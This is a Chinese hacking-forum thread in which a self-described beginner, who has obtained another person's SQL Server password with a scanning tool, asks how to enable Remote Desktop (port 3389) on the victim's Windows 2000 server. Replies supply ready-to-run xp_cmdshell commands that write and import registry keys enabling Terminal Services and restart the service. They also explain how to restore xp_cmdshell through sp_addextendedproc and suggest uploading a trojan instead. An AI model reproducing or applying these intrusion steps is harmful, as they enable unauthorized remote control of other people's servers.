返回列表 发帖

如何开3389啊

我用WINNTAutoAttack扫到sql口令
  但没开3389  怎样在WINNTAutoAttack上的sqlcmd上开启3389啊
求助啊

还提醒你一下,既然你都能执行xp_cmdshell了,为什么你还要去开别人的3389,还要去想办法主动连接别人,你就不能直接弄个马上去,使用xp_cmdshell执行了搞定吗?
何必这么麻烦!?
阿呆主站:CISP中国网
注册信息安全专业人员资质认证(CISP)资料,心得以及备考指南。
阿呆的BLOG:北京SEO
这里时刻记录着阿呆在学习SEO及网络安全过程中的点点滴滴!

TOP

我连了 可问题又来了 我输入正确的用户名密码后 提示用户名或密码错误
  对方是内网   不知道和这个有没有关系

TOP

哦 非常谢谢

TOP

我记不得太多了,因为现在手里的不是XP就是2003的系统,所以只能按照自己的模糊的记忆给你点提示了,不保证完全成功,你可以试试!
分别执行
命令一:
  1. exec [master].[dbo].[xp_cmdshell] 'cd \ && c: && echo Windows Registry Editor Version 5.00 > 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 1.reg && echo "ShutdownWithoutLogon"="0" >> 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 1.reg && echo "EnableAdminTSRemote"=dword:00000001 >> 1.reg && echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 1.reg && echo "TSEnabled"=dword:00000001 >> 1.reg && echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 1.reg && echo "PortNumber"=dword:00000D3D >> 1.reg'
复制代码
命令二:
  1. exec [master].[dbo].[xp_cmdshell] 'regedit /s c:\1.reg && net stop "Terminal Server" && net start "Terminal Server"'
复制代码
给你写了两条命令,这两条命令全部是在SQL的shell里面使用的,由于写的比较急,可能还存在问题吧,你可以试试!
1

评分人数

阿呆主站:CISP中国网
注册信息安全专业人员资质认证(CISP)资料,心得以及备考指南。
阿呆的BLOG:北京SEO
这里时刻记录着阿呆在学习SEO及网络安全过程中的点点滴滴!

TOP

有那个sql的shell 对方是win2000server
  你能不能说的详细点阿   谢了
    我是菜鸟啊

TOP

能使用基于SQL的shell吗?也就是大家熟悉的"xp_cmdshell",如果不能使用,尝试下exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'看看能不能恢复,如果可以,再尝试使用这个shell编写一个批处理,直接对注册表进行操作,然后开启对方的3389。
阿呆主站:CISP中国网
注册信息安全专业人员资质认证(CISP)资料,心得以及备考指南。
阿呆的BLOG:北京SEO
这里时刻记录着阿呆在学习SEO及网络安全过程中的点点滴滴!

TOP

不同的系统有不同的方法。。
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

补充  看了他的c盘 没有Documents and Settings

TOP

返回列表